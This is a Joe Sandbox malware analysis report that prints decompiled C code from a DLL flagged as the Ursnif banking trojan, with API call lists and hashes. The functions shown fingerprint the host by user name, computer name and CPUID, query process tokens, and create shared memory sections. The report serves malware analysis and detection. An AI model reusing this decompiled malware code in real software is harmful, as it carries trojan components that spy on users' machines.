                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001B.00000002.361195316.00000000074A8000.00000004.00000040.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Analysis Process: loaddll32.exe PID: 2880 Parent PID: 5176 loaddll32.exeCOMMON

                                          Executed Functions

                                          Function 00C732BA, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E00C732BA(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xc7d2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0xc7d238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xc7d2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0xc7d238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xc7d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xc7d2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0xc7d2a4; // 0x24ba5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xc7e7e8; // 0x73797325
				_t83 = E00C777E6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xc7d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xc7d2a4; // 0x24ba5a8
				_t16 = _t93 + 0xc7e809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                          0x00c732c3
                                          0x00c732c9
                                          0x00c732cb
                                          0x00c732e5
                                          0x00c732e7
                                          0x00c732ec
                                          0x00c73561
                                          0x00c73568
                                          0x00c73568
                                          0x00c732f2
                                          0x00c73307
                                          0x00c73309
                                          0x00c7330b
                                          0x00c73310
                                          0x00c73551
                                          0x00c7355b
                                          0x00000000
                                          0x00c7355b
                                          0x00c73316
                                          0x00c73321
                                          0x00c73326
                                          0x00c7332b
                                          0x00c7332e
                                          0x00c73335
                                          0x00c7333a
                                          0x00c7333f
                                          0x00c73541
                                          0x00c7354b
                                          0x00000000
                                          0x00c7354b
                                          0x00c73355
                                          0x00c73359
                                          0x00c7335c
                                          0x00c7335f
                                          0x00c73365
                                          0x00c7336a
                                          0x00c73373
                                          0x00c73379
                                          0x00c73383
                                          0x00c7338a
                                          0x00c7338a
                                          0x00c7339c
                                          0x00c733a7
                                          0x00c733b5
                                          0x00c733ba
                                          0x00c733bf
                                          0x00c733c2
                                          0x00c733c7
                                          0x00c733d1
                                          0x00c733d4
                                          0x00c733d7
                                          0x00c733ed
                                          0x00c733ef
                                          0x00c733f4
                                          0x00c7353f
                                          0x00000000
                                          0x00c7353f
                                          0x00c7340b
                                          0x00c7345c
                                          0x00c7341f
                                          0x00c73427
                                          0x00c7342c
                                          0x00c7343a
                                          0x00c73443
                                          0x00c7344c
                                          0x00c7344c
                                          0x00c7345a
                                          0x00c7345a
                                          0x00c73460
                                          0x00c73464
                                          0x00c73464
                                          0x00c7346a
                                          0x00000000
                                          0x00000000
                                          0x00c7346c
                                          0x00c73472
                                          0x00c73519
                                          0x00c7351c
                                          0x00c73529
                                          0x00c73529
                                          0x00c7352d
                                          0x00000000
                                          0x00000000
                                          0x00c73522
                                          0x00c73526
                                          0x00c73526
                                          0x00c73528
                                          0x00c73528
                                          0x00c73532
                                          0x00c73539
                                          0x00c7353b
                                          0x00000000
                                          0x00c7353b
                                          0x00c73478
                                          0x00c7347a
                                          0x00c7347a
                                          0x00c7348d
                                          0x00c73493
                                          0x00c7349e
                                          0x00c734a0
                                          0x00c734a4
                                          0x00c734a6
                                          0x00c734a6
                                          0x00c734ab
                                          0x00c734ad
                                          0x00c734ad
                                          0x00c734ab
                                          0x00c734b2
                                          0x00c734b6
                                          0x00c734b6
                                          0x00c734c6
                                          0x00c734cb
                                          0x00c734ce
                                          0x00c734ce
                                          0x00c734d1
                                          0x00c734db
                                          0x00c734e3
                                          0x00c734e8
                                          0x00c734f6
                                          0x00c734f6
                                          0x00c7350a
                                          0x00c7350e
                                          0x00c7350e

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 00C732E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00C73307
                                          • memset.NTDLL ref: 00C73321
                                            • Part of subcall function 00C777E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,00C7333A,73797325), ref: 00C777F7
                                            • Part of subcall function 00C777E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00C77811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00C7335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00C73373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00C7338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00C73396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 00C733D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00C733ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 00C7340B
                                          • FindNextFileA.KERNEL32(00C7207E,?), ref: 00C7341F
                                          • FindClose.KERNEL32(00C7207E), ref: 00C7342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00C73438
                                          • CompareFileTime.KERNEL32(?,?), ref: 00C7345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 00C7348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 00C734C6
                                          • FindNextFileA.KERNELBASE(00C7207E,?), ref: 00C734DB
                                          • FindClose.KERNEL32(00C7207E), ref: 00C734E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00C734F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 00C73504
                                          • FindClose.KERNEL32(00C7207E), ref: 00C73539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00C7354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C7355B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: 3270a98ed65cc8487d060babcf41100986c90a4f7266a3490fbde5dc59e283a5
                                          • Instruction ID: 4ecc8ea7385ffdb0678811d7f5a03309b42548442f942fdbc94a92bf7cd2d3d2
                                          • Opcode Fuzzy Hash: 3270a98ed65cc8487d060babcf41100986c90a4f7266a3490fbde5dc59e283a5
                                          • Instruction Fuzzy Hash: B4812A71900159EFDB119FA5DC84BEEBBB9FF48300F10816AE519E6260D7319A85DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F10FC, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 163 5f10fc-5f1153 GetSystemTimeAsFileTime _aulldiv _snwprintf 164 5f115a-5f1173 CreateFileMappingW 163->164 165 5f1155 163->165 166 5f11bd-5f11c3 GetLastError 164->166 167 5f1175-5f117e 164->167 165->164 168 5f11c5-5f11cb 166->168 169 5f118e-5f119c MapViewOfFile 167->169 170 5f1180-5f1187 GetLastError 167->170 172 5f119e-5f11aa 169->172 173 5f11ac-5f11b2 GetLastError 169->173 170->169 171 5f1189-5f118c 170->171 174 5f11b4-5f11bb CloseHandle 171->174 172->168 173->168 173->174 174->168
                                          C-Code - Quality: 69%
                                          			E005F10FC(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L005F2180();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x5f4144;
				_push(_t15 + 0x5f505e);
				_push(_t15 + 0x5f5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L005F217A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x5f4148, "true", 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                          0x005f10fc
                                          0x005f1105
                                          0x005f1109
                                          0x005f110f
                                          0x005f1114
                                          0x005f1119
                                          0x005f111c
                                          0x005f111f
                                          0x005f1124
                                          0x005f1125
                                          0x005f1128
                                          0x005f1133
                                          0x005f113a
                                          0x005f113e
                                          0x005f1140
                                          0x005f1141
                                          0x005f1144
                                          0x005f1149
                                          0x005f1153
                                          0x005f1155
                                          0x005f1155
                                          0x005f1169
                                          0x005f116f
                                          0x005f1173
                                          0x005f11c3
                                          0x005f1175
                                          0x005f117e
                                          0x005f1194
                                          0x005f119c
                                          0x005f11ae
                                          0x005f11b2
                                          0x00000000
                                          0x00000000
                                          0x005f119e
                                          0x005f11a1
                                          0x005f11a6
                                          0x005f11a8
                                          0x005f11a8
                                          0x005f1189
                                          0x005f118b
                                          0x005f11b4
                                          0x005f11b5
                                          0x005f11b5
                                          0x005f117e
                                          0x005f11cb

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,005F175D,0000000A,?,?), ref: 005F1109
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005F111F
                                          • _snwprintf.NTDLL ref: 005F1144
                                          • CreateFileMappingW.KERNELBASE(000000FF,005F4148,00000004,00000000,?,?), ref: 005F1169
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,005F175D,0000000A,?), ref: 005F1180
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 005F1194
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,005F175D,0000000A,?), ref: 005F11AC
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,005F175D,0000000A), ref: 005F11B5
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,005F175D,0000000A,?), ref: 005F11BD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1724014008-0
                                          • Opcode ID: 56a7806e4443173107f7e1948a8115fb1d843934f1449540262610678156a44c
                                          • Instruction ID: e9f3b55dcb3dbf3bb8151758d161d34dc0108c4e2e69e9c59f669985be29f437
                                          • Opcode Fuzzy Hash: 56a7806e4443173107f7e1948a8115fb1d843934f1449540262610678156a44c
                                          • Instruction Fuzzy Hash: 5F216DB260060CFBD710AFA4DC88EBE3BADEB94350F104125F715D7190DA789949DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C793D5, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 184 c793d5-c793e9 185 c793f3-c79405 call c76f89 184->185 186 c793eb-c793f0 184->186 189 c79407-c79417 GetUserNameW 185->189 190 c79459-c79466 185->190 186->185 191 c79468-c7947f GetComputerNameW 189->191 192 c79419-c79429 RtlAllocateHeap 189->192 190->191 193 c79481-c79492 RtlAllocateHeap 191->193 194 c794bd-c794e1 191->194 192->191 195 c7942b-c79438 GetUserNameW 192->195 193->194 196 c79494-c7949d GetComputerNameW 193->196 197 c7943a-c79446 call c77cf7 195->197 198 c79448-c79457 HeapFree 195->198 199 c7949f-c794ab call c77cf7 196->199 200 c794ae-c794b7 HeapFree 196->200 197->198 198->191 199->200 200->194
                                          C-Code - Quality: 96%
                                          			E00C793D5(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xc7d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00C76F89( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xc7d2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xc7d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00C77CF7(_v8 + _v8, _t64);
							}
							HeapFree( *0xc7d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xc7d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00C77CF7(_v8 + _v8, _t64);
						}
						HeapFree( *0xc7d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                          0x00c793d5
                                          0x00c793dd
                                          0x00c793e1
                                          0x00c793e4
                                          0x00c793e9
                                          0x00c793eb
                                          0x00c793f0
                                          0x00c793f0
                                          0x00c793f6
                                          0x00c793f8
                                          0x00c79405
                                          0x00c79466
                                          0x00c79407
                                          0x00c7940c
                                          0x00c79412
                                          0x00c79417
                                          0x00c79425
                                          0x00c79429
                                          0x00c79438
                                          0x00c7943f
                                          0x00c79446
                                          0x00c79446
                                          0x00c79451
                                          0x00c79451
                                          0x00c79429
                                          0x00c79417
                                          0x00c79468
                                          0x00c7946e
                                          0x00c79478
                                          0x00c7947a
                                          0x00c7947f
                                          0x00c7948e
                                          0x00c79492
                                          0x00c7949d
                                          0x00c794a4
                                          0x00c794ab
                                          0x00c794ab
                                          0x00c794b7
                                          0x00c794b7
                                          0x00c79492
                                          0x00c794c2
                                          0x00c794c4
                                          0x00c794c7
                                          0x00c794c9
                                          0x00c794cc
                                          0x00c794cf
                                          0x00c794d9
                                          0x00c794dd
                                          0x00c794e1

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00C7940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C79423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00C79430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C79451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C79478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00C7948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C79499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C794B7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 12e3b1565a5b51c275ead4dcd2eb882869c4a0d1c4c59e91715dca4d78ae5bb3
                                          • Instruction ID: 0836de0ccd28b258fe6198adc0116ef15fe7c8f6dcdd966aa18ad78682f82b2b
                                          • Opcode Fuzzy Hash: 12e3b1565a5b51c275ead4dcd2eb882869c4a0d1c4c59e91715dca4d78ae5bb3
                                          • Instruction Fuzzy Hash: 3A31E9B1A00209EFDB11DFA9DD81B6EB7F9FF48300F518569E519D6221DB30EE429B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C771B9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E00C771B9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00C758BE(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00C7147E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                          0x00c771c6
                                          0x00c771c7
                                          0x00c771c8
                                          0x00c771c9
                                          0x00c771ca
                                          0x00c771ce
                                          0x00c771d5
                                          0x00c771e4
                                          0x00c771e7
                                          0x00c771ea
                                          0x00c771f1
                                          0x00c771f4
                                          0x00c771f7
                                          0x00c771fa
                                          0x00c771fd
                                          0x00c77208
                                          0x00c7720a
                                          0x00c77213
                                          0x00c7721b
                                          0x00c7721d
                                          0x00c7722f
                                          0x00c77239
                                          0x00c7723d
                                          0x00c7724c
                                          0x00c77250
                                          0x00c77259
                                          0x00c77261
                                          0x00c77261
                                          0x00c77263
                                          0x00c77263
                                          0x00c7726b
                                          0x00c77271
                                          0x00c77275
                                          0x00c77275
                                          0x00c77280

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00C77200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00C77213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00C7722F
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00C7724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 00C77259
                                          • NtClose.NTDLL(?), ref: 00C7726B
                                          • NtClose.NTDLL(00000000), ref: 00C77275
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 01e5353ea33ab9eab775d1191bb961b71f2b92263cb8fa8c2b9a242d42790f89
                                          • Instruction ID: 4acf420c098af1cd1a33bbfe06236cfc150a7fdbbea2c7e0ea91b528da0d1af7
                                          • Opcode Fuzzy Hash: 01e5353ea33ab9eab775d1191bb961b71f2b92263cb8fa8c2b9a242d42790f89
                                          • Instruction Fuzzy Hash: E721E97190011DFBDB019FA5CC85ADEBFBDEF18740F108126F908E6161D7719A84EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F1A34, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E005F1A34(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E005F10BA(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                          0x005f1a3d
                                          0x005f1a44
                                          0x005f1a45
                                          0x005f1a46
                                          0x005f1a47
                                          0x005f1a48
                                          0x005f1a59
                                          0x005f1a5d
                                          0x005f1a71
                                          0x005f1a74
                                          0x005f1a77
                                          0x005f1a7e
                                          0x005f1a81
                                          0x005f1a88
                                          0x005f1a8b
                                          0x005f1a8e
                                          0x005f1a91
                                          0x005f1a96
                                          0x005f1ad1
                                          0x005f1a98
                                          0x005f1a9b
                                          0x005f1aa1
                                          0x005f1aa6
                                          0x005f1aaa
                                          0x005f1ac8
                                          0x005f1aac
                                          0x005f1ab3
                                          0x005f1ac1
                                          0x005f1ac1
                                          0x005f1aaa
                                          0x005f1ad9

                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 005F1A91
                                            • Part of subcall function 005F10BA: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,005F1AA6,00000002,00000000,?,?,00000000,?,?,005F1AA6,00000002), ref: 005F10E7
                                          • memset.NTDLL ref: 005F1AB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID: @
                                          • API String ID: 2533685722-2766056989
                                          • Opcode ID: aaaf58aa3bdd7b37c329ea1a53909f0b58be6d2e70c64ad720e0741f46616211
                                          • Instruction ID: feefcd2f678707e9865541da04b47fea168dd12dade7a50bf78870a7c3292b03
                                          • Opcode Fuzzy Hash: aaaf58aa3bdd7b37c329ea1a53909f0b58be6d2e70c64ad720e0741f46616211
                                          • Instruction Fuzzy Hash: 9E21E8B1D0060DEFCB11DFA9C8849EEFBB9FB48354F104429E655F3210D6359A448BA4
